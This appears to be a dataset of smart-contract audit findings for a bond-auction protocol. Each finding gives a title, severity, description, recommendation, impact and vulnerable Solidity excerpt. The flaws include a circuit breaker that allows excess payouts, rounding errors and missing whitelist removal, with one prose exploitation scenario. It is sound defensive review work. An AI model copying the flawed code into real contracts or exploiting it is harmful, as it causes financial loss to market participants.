Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n\\n`meta.tuneInterval` has impact on `meta.tuneIntervalCapacity`. That means that when you change tuning interval you also change the capacity that is operated during tuning. There is also one more param that depends on this, but is not counted here.\\n```\\n if (\\n (market.capacity < meta.tuneBelowCapacity && timeNeutralCapacity < initialCapacity) ||\\n (time_ >= meta.lastTune + meta.tuneInterval && timeNeutralCapacity > initialCapacity)\\n ) {\\n // Calculate the correct payout to complete on time assuming each bond\\n // will be max size in the desired deposit interval for the remaining time\\n //\\n // i.e. market has 10 days remaining. deposit interval is 1 day. capacity\\n // is 10,000 TOKEN. max payout would be 1,000 TOKEN (10,000 * 1 / 10).\\n markets[id_].maxPayout = capacity.mulDiv(uint256(meta.depositInterval), timeRemaining);\\n\\n\\n // Calculate ideal target debt to satisty capacity in the remaining time\\n // The target debt is based on whether the market is under or oversold at this point in time\\n // This target debt will ensure price is reactive while ensuring the magnitude of being over/undersold\\n // doesn't cause larger fluctuations towards the end of the market.\\n //\\n // Calculate target debt from the timeNeutralCapacity and the ratio of debt decay interval and the length of the market\\n uint256 targetDebt = timeNeutralCapacity.mulDiv(\\n uint256(meta.debtDecayInterval),\\n uint256(meta.length)\\n );\\n\\n\\n // Derive a new control variable from the target debt\\n uint256 controlVariable = terms[id_].controlVariable;\\n uint256 newControlVariable = price_.mulDivUp(market.scale, targetDebt);\\n\\n\\n emit Tuned(id_, controlVariable, newControlVariable);\\n\\n\\n if (newControlVariable < controlVariable) {\\n // If decrease, control variable change will be carried out over the tune interval\\n // this is because price will be lowered\\n uint256 change = controlVariable - newControlVariable;\\n adjustments[id_] = Adjustment(change, time_, meta.tuneAdjustmentDelay, true);\\n } else {\\n // Tune up immediately\\n terms[id_].controlVariable = newControlVariable;\\n // Set current adjustment to inactive (e.g. if we are re-tuning early)\\n adjustments[id_].active = false;\\n }\\n\\n\\n metadata[id_].lastTune = time_;\\n metadata[id_].tuneBelowCapacity = market.capacity > meta.tuneIntervalCapacity\\n ? market.capacity - meta.tuneIntervalCapacity\\n : 0;\\n metadata[id_].lastTuneDebt = targetDebt;\\n }\\n```\\n\\nIf you don't update `meta.tuneBelowCapacity` when changing intervals you have a risk, that price will not be tuned when tuneIntervalCapacity was decreased or it will be still tuned when tuneIntervalCapacity was increased.\\nAs a result tuning will not be completed when needed.чUpdate meta.tuneBelowCapacity in BondBaseSDA.setIntervals function.чTuning logic will not be completed when needed.ч```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n -Existing Circuit Breaker Implementation Allow Faster Taker To Extract Payout Tokens From MarketчmediumчThe current implementation of the circuit breaker is not optimal. Thus, the market maker will lose an excessive amount of payout tokens if a quoted token suddenly loses a large amount of value, even with a circuit breaker in place.\\nWhen the amount of the payout tokens purchased by the taker exceeds the `term.maxDebt`, the taker is still allowed to carry on with the transaction, and the market will only be closed after the current transaction is completed.\\n```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n\\nAssume that the state of the SDAM at T0 is as follows:\\n`term.maxDebt` is 110 (debt buffer = 10%)\\n`maxPayout` is 100\\n`market.totalDebt` is 99\\nAssume that the quoted token suddenly loses a large amount of value (e.g. stablecoin depeg causing the quote token to drop to almost zero). Bob decided to purchase as many payout tokens as possible before reaching the `maxPayout` limit to maximize the value he could extract from the market. Assume that Bob is able to purchase 50 bond tokens at T1 before reaching the `maxPayout` limit. As such, the state of the SDAM at T1 will be as follows:\\n`term.maxDebt` = 110\\n`maxPayout` = 100\\n`market.totalDebt` = 99 + 50 = 149\\nIn the above scenario, Bob's purchase has already breached the `term.maxDebt` limit. However, he could still purchase the 50 bond tokens in the current transaction.чConsidering only allowing takers to purchase bond tokens up to the `term.maxDebt` limit.\\nFor instance, based on the earlier scenario, only allow Bob to purchase up to 11 bond tokens (term.maxDebt[110] - market.totalDebt[99]) instead of allowing him to purchase 50 bond tokens.\\nIf Bob attempts to purchase 50 bond tokens, the market can proceed to purchase the 11 bond tokens for Bob, and the remaining quote tokens can be refunded back to Bob. After that, since the `term.maxDebt (110) == market.totalDebt (110)`, the market can trigger the circuit breaker to close the market to protect the market from potential extreme market conditions.\\nThis ensures that bond tokens beyond the `term.maxDebt` limit would not be sold to the taker during extreme market conditions.чIn the event that the price of the quote token falls to almost zero (e.g. 0.0001 dollars), then the fastest taker will be able to extract as many payout tokens as possible before reaching the `maxPayout` limit from the market. The extracted payout tokens are essentially free for the fastest taker. Taker gain is maker loss.\\nAdditionally, in the event that a quoted token suddenly loses a large amount of value, the amount of payout tokens lost by the market marker is capped at the `maxPayout` limit instead of capping the loss at the `term.maxDebt` limit. This resulted in the market makers losing more payout tokens than expected, and their payout tokens being sold to the takers at a very low price (e.g. 0.0001 dollars).\\nThe market makers will suffer more loss if the `maxPayout` limit of their markets is higher.ч```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n -Market Price Lower Than ExpectedчmediumчThe market price does not conform to the specification documented within the whitepaper. As a result, the computed market price is lower than expected.\\nThe following definition of the market price is taken from the whitepaper. Taken from Page 13 of the whitepaper - Definition 25\\n\\nThe integer implementation of the market price must be rounded up per the whitepaper. This ensures that the integer implementation of the market price is greater than or equal to the real value of the market price so as to protect makers from selling tokens at a lower price than expected.\\nWithin the `BondBaseSDA.marketPrice` function, the computation of the market price is rounded up in Line 688, which conforms to the specification.\\n```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? price : markets[id_].minPrice;\\n }\\n```\\n\\nHowever, within the `BondBaseSDA._currentMarketPrice` function, the market price is rounded down, resulting in the makers selling tokens at a lower price than expected.\\n```\\nFile: BondBaseSDA.sol\\n function _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n }\\n```\\nчEnsure the market price is rounded up so that the desired property can be achieved and the makers will not be selling tokens at a lower price than expected.\\n```\\nfunction _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n// Remove the line below\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n// Add the line below\\n return terms[id_].controlVariable.mulDivUp(market.totalDebt, market.scale);\\n}\\n```\\nчLoss for the makers as their tokens are sold at a lower price than expected.\\nAdditionally, the affected `BondBaseSDA._currentMarketPrice` function is used within the `BondBaseSDA._decayAndGetPrice` function to derive the market price. Since a lower market price will be returned, this will lead to a higher amount of payout tokens. Subsequently, the `lastDecayIncrement` will be higher than expected, which will lead to a lower `totalDebt`. Lower debt means a lower market price will be computed later.ч```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? price : markets[id_].minPrice;\\n }\\n```\\n -Teller Cannot Be Removed From Callback ContractчmediumчIf a vulnerable Teller is being exploited by an attacker, there is no way for the owner of the Callback Contract to remove the vulnerable Teller from their Callback Contract.\\nThe Callback Contract is missing the feature to remove a Teller. Once a Teller has been added to the whitelist (approvedMarkets mapping), it is not possible to remove the Teller from the whitelist.\\n```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\nчConsider implementing an additional function to allow the removal of a Teller from the whitelist (approvedMarkets mapping), so that a vulnerable Teller can be removed swiftly if needed.\\n```\\nfunction removeFromWhitelist(address teller_, uint256 id_) external override onlyOwner {\\n approvedMarkets[teller_][id_] = false;\\n}\\n```\\n\\nNote: Although the owner of the Callback Contract can DOS its own market by abusing the `removeFromWhitelist` function, no sensible owner would do so.чIn the event that a whitelisted Teller is found to be vulnerable and has been actively exploited by an attacker in the wild, the owner of the Callback Contract needs to mitigate the issue swiftly by removing the vulnerable Teller from the Callback Contract to stop it from draining the asset within the Callback Contract. However, the mitigation effort will be hindered by the fact there is no way to remove a Teller within the Callback Contract once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Teller to drain assets within the Callback Contract. The Callback Contract owners would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the owner accidentally whitelisted the wrong Teller, there is no way to remove it.ч```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\n -Create Fee Discount Feature Is BrokenчmediumчThe create fee discount feature is found to be broken within the protocol.\\nThe create fee discount feature relies on the `createFeeDiscount` state variable to determine the fee to be discounted from the protocol fee. However, it was observed that there is no way to initialize the `createFeeDiscount` state variable. As a result, the `createFeeDiscount` state variable will always be zero.\\n```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n\\n```\\nFile: BondFixedTermTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_ - feeAmount);\\n\\n return (tokenId, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_);\\n\\n return (tokenId, amount_);\\n }\\n```\\nчImplement a setter method for the `createFeeDiscount` state variable and the necessary verification checks.\\n```\\nfunction setCreateFeeDiscount(uint48 createFeeDiscount_) external requiresAuth {\\n if (createFeeDiscount_ > protocolFee) revert Teller_InvalidParams();\\n if (createFeeDiscount_ > 5e3) revert Teller_InvalidParams();\\n createFeeDiscount = createFeeDiscount_;\\n}\\n```\\nчThe create fee discount feature is broken within the protocol. There is no way for the protocol team to configure a discount for the users of the `BondFixedExpiryTeller.create` and `BondFixedTermTeller.create` functions. As such, the users will not obtain any discount from the protocol when using the create function.ч```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n -`BondAggregator.findMarketFor` Function Will Break In Certain Conditionsчmediumч`BondAggregator.findMarketFor` function will break when the `BondBaseSDA.payoutFor` function within the for-loop reverts under certain conditions.\\nThe `BondBaseSDA.payoutFor` function will revert if the computed payout is larger than the market's max payout. Refer to Line 711 below.\\n```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n\\nThe `BondAggregator.findMarketFor` function will call the `BondBaseSDA.payoutFor` function at Line 245. The `BondBaseSDA.payoutFor` function will revert if the final computed payout is larger than the `markets[id_].maxPayout` as mentioned earlier. This will cause the entire for-loop to \"break\" and the transaction to revert.\\nAssume that the user configures the `minAmountOut_` to be `0`, then the condition `minAmountOut_ <= maxPayout` Line 244 will always be true. The `amountIn_` will always be passed to the `payoutFor` function. In some markets where the computed payout is larger than the market's max payout, the `BondAggregator.findMarketFor` function will revert.\\n```\\nFile: BondAggregator.sol\\n /// @inheritdoc IBondAggregator\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n uint256[] memory ids = marketsFor(payout_, quote_);\\n uint256 len = ids.length;\\n uint256[] memory payouts = new uint256[](len);\\n\\n uint256 highestOut;\\n uint256 id = type(uint256).max; // set to max so an empty set doesn't return 0, the first index\\n uint48 vesting;\\n uint256 maxPayout;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < len; ++i) {\\n auctioneer = marketsToAuctioneers[ids[i]];\\n (, , , , vesting, maxPayout) = auctioneer.getMarketInfoForPurchase(ids[i]);\\n\\n uint256 expiry = (vesting <= MAX_FIXED_TERM) ? block.timestamp + vesting : vesting;\\n\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n }\\n\\n return id;\\n }\\n```\\nчConsider using try-catch or address.call to handle the revert of the `BondBaseSDA.payoutFor` function within the for-loop gracefully. This ensures that a single revert of the `BondBaseSDA.payoutFor` function will not affect the entire for-loop within the `BondAggregator.findMarketFor` function.чThe find market feature within the protocol is broken under certain conditions. As such, users would not be able to obtain the list of markets that meet their requirements. The market makers affected by this issue will lose the opportunity to sell their bond tokens.ч```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n -Auctioneer Cannot Be Removed From The ProtocolчmediumчIf a vulnerable Auctioneer is being exploited by an attacker, there is no way to remove the vulnerable Auctioneer from the protocol.\\nThe protocol is missing the feature to remove an auctioneer. Once an auctioneer has been added to the whitelist, it is not possible to remove the auctioneer from the whitelist.\\n```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\nчConsider implementing an additional function to allow the removal of an Auctioneer from the whitelist, so that vulnerable Auctioneer can be removed swiftly if needed.\\n```\\nfunction deregisterAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Remove the auctioneer from the whitelist\\n _whitelist[address(auctioneer_)] = false;\\n}\\n```\\nчIn the event that a whitelisted Auctioneer is found to be vulnerable and has been actively exploited by an attacker in the wild, the protocol needs to mitigate the issue swiftly by removing the vulnerable Auctioneer from the protocol. However, the mitigation effort will be hindered by the fact there is no way to remove an Auctioneer within the protocol once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Auctioneer. The protocol team would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the admin accidentally whitelisted the wrong Auctioneer, there is no way to remove it.ч```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\n -Debt Decay Faster Than ExpectedчmediumчThe debt decay at a rate faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nThe following definition of the debt decay reference time following any purchases at time `t` taken from the whitepaper. The second variable, which is the delay increment, is rounded up. Following is taken from Page 15 of the whitepaper - Definition 27\\n\\nHowever, the actual implementation in the codebase differs from the specification. At Line 514, the delay increment is rounded down instead.\\n```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\nчWhen computing the `lastDecayIncrement`, the result should be rounded up.\\n```\\n// Set last decay timestamp based on size of purchase to linearize decay\\n// Remove the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n// Add the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDivUp(payout_, lastTuneDebt);\\nmetadata[id_].lastDecay // Add the line below\\n= uint48(lastDecayIncrement);\\n```\\nчWhen the delay increment (TD) is rounded down, the debt decay reference time increment will be smaller than expected. The debt component will then decay at a faster rate. As a result, the market price will not be adjusted in an optimized manner, and the market price will fall faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nFollowing is taken from Page 8 of the whitepaper - Definition 8\\nч```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\n -BondBaseSDA.setDefaults doesn't validate inputsчmediumчBondBaseSDA.setDefaults doesn't validate inputs which can lead to initializing new markets incorrectly\\n```\\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\\n // Restricted to authorized addresses\\n defaultTuneInterval = defaults_[0];\\n defaultTuneAdjustment = defaults_[1];\\n minDebtDecayInterval = defaults_[2];\\n minDepositInterval = defaults_[3];\\n minMarketDuration = defaults_[4];\\n minDebtBuffer = defaults_[5];\\n }\\n```\\n\\nFunction BondBaseSDA.setDefaults doesn't do any checkings, as you can see. Because of that it's possible to provide values that will break market functionality.\\nFor example you can set `minDepositInterval` to be bigger than `minMarketDuration` and it will be not possible to create new market.\\nOr you can provide `minDebtBuffer` to be 100% ot 0% that will break logic of market closing.чAdd input validation.чCan't create new market or market logic will be not working as designed.ч```\\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\\n // Restricted to authorized addresses\\n defaultTuneInterval = defaults_[0];\\n defaultTuneAdjustment = defaults_[1];\\n minDebtDecayInterval = defaults_[2];\\n minDepositInterval = defaults_[3];\\n minMarketDuration = defaults_[4];\\n minDebtBuffer = defaults_[5];\\n }\\n```\\n -BondAggregator.liveMarketsBy eventually will revert because of block gas limitчmediumчBondAggregator.liveMarketsBy eventually will revert because of block gas limit\\n```\\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\\n uint256 count;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ++count;\\n }\\n }\\n\\n\\n uint256[] memory ids = new uint256[](count);\\n count = 0;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ids[count] = i;\\n ++count;\\n }\\n }\\n\\n\\n return ids;\\n }\\n```\\n\\nBondAggregator.liveMarketsBy function is looping through all markets and does at least `marketCounter` amount of external calls(when all markets are not live) and at most 4 * `marketCounter` external calls(when all markets are live and owner matches. This all consumes a lot of gas, even that is called from view function. And each new market increases loop size.\\nThat means that after some time `marketsToAuctioneers` mapping will be big enough that the gas amount sent for view/pure function will be not enough to retrieve all data(50 million gas according to this). So the function will revert.\\nAlso similar problem is with `findMarketFor`, `marketsFor` and `liveMarketsFor` functions.чRemove not active markets or some start and end indices to functions.чFunctions will always revert and whoever depends on it will not be able to get information.ч```\\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\\n uint256 count;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ++count;\\n }\\n }\\n\\n\\n uint256[] memory ids = new uint256[](count);\\n count = 0;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ids[count] = i;\\n ++count;\\n }\\n }\\n\\n\\n return ids;\\n }\\n```\\n -meta.tuneBelowCapacity param is not updated when BondBaseSDA.setIntervals is calledчmediumчWhen BondBaseSDA.setIntervals function is called then meta.tuneBelowCapacity param is not updated which has impact on price tuning.\\n```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n\\n`meta.tuneInterval` has impact on `meta.tuneIntervalCapacity`. That means that when you change tuning interval you also change the capacity that is operated during tuning. There is also one more param that depends on this, but is not counted here.\\n```\\n if (\\n (market.capacity < meta.tuneBelowCapacity && timeNeutralCapacity < initialCapacity) ||\\n (time_ >= meta.lastTune + meta.tuneInterval && timeNeutralCapacity > initialCapacity)\\n ) {\\n // Calculate the correct payout to complete on time assuming each bond\\n // will be max size in the desired deposit interval for the remaining time\\n //\\n // i.e. market has 10 days remaining. deposit interval is 1 day. capacity\\n // is 10,000 TOKEN. max payout would be 1,000 TOKEN (10,000 * 1 / 10).\\n markets[id_].maxPayout = capacity.mulDiv(uint256(meta.depositInterval), timeRemaining);\\n\\n\\n // Calculate ideal target debt to satisty capacity in the remaining time\\n // The target debt is based on whether the market is under or oversold at this point in time\\n // This target debt will ensure price is reactive while ensuring the magnitude of being over/undersold\\n // doesn't cause larger fluctuations towards the end of the market.\\n //\\n // Calculate target debt from the timeNeutralCapacity and the ratio of debt decay interval and the length of the market\\n uint256 targetDebt = timeNeutralCapacity.mulDiv(\\n uint256(meta.debtDecayInterval),\\n uint256(meta.length)\\n );\\n\\n\\n // Derive a new control variable from the target debt\\n uint256 controlVariable = terms[id_].controlVariable;\\n uint256 newControlVariable = price_.mulDivUp(market.scale, targetDebt);\\n\\n\\n emit Tuned(id_, controlVariable, newControlVariable);\\n\\n\\n if (newControlVariable < controlVariable) {\\n // If decrease, control variable change will be carried out over the tune interval\\n // this is because price will be lowered\\n uint256 change = controlVariable - newControlVariable;\\n adjustments[id_] = Adjustment(change, time_, meta.tuneAdjustmentDelay, true);\\n } else {\\n // Tune up immediately\\n terms[id_].controlVariable = newControlVariable;\\n // Set current adjustment to inactive (e.g. if we are re-tuning early)\\n adjustments[id_].active = false;\\n }\\n\\n\\n metadata[id_].lastTune = time_;\\n metadata[id_].tuneBelowCapacity = market.capacity > meta.tuneIntervalCapacity\\n ? market.capacity - meta.tuneIntervalCapacity\\n : 0;\\n metadata[id_].lastTuneDebt = targetDebt;\\n }\\n```\\n\\nIf you don't update `meta.tuneBelowCapacity` when changing intervals you have a risk, that price will not be tuned when tuneIntervalCapacity was decreased or it will be still tuned when tuneIntervalCapacity was increased.\\nAs a result tuning will not be completed when needed.чUpdate meta.tuneBelowCapacity in BondBaseSDA.setIntervals function.чTuning logic will not be completed when needed.ч```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n 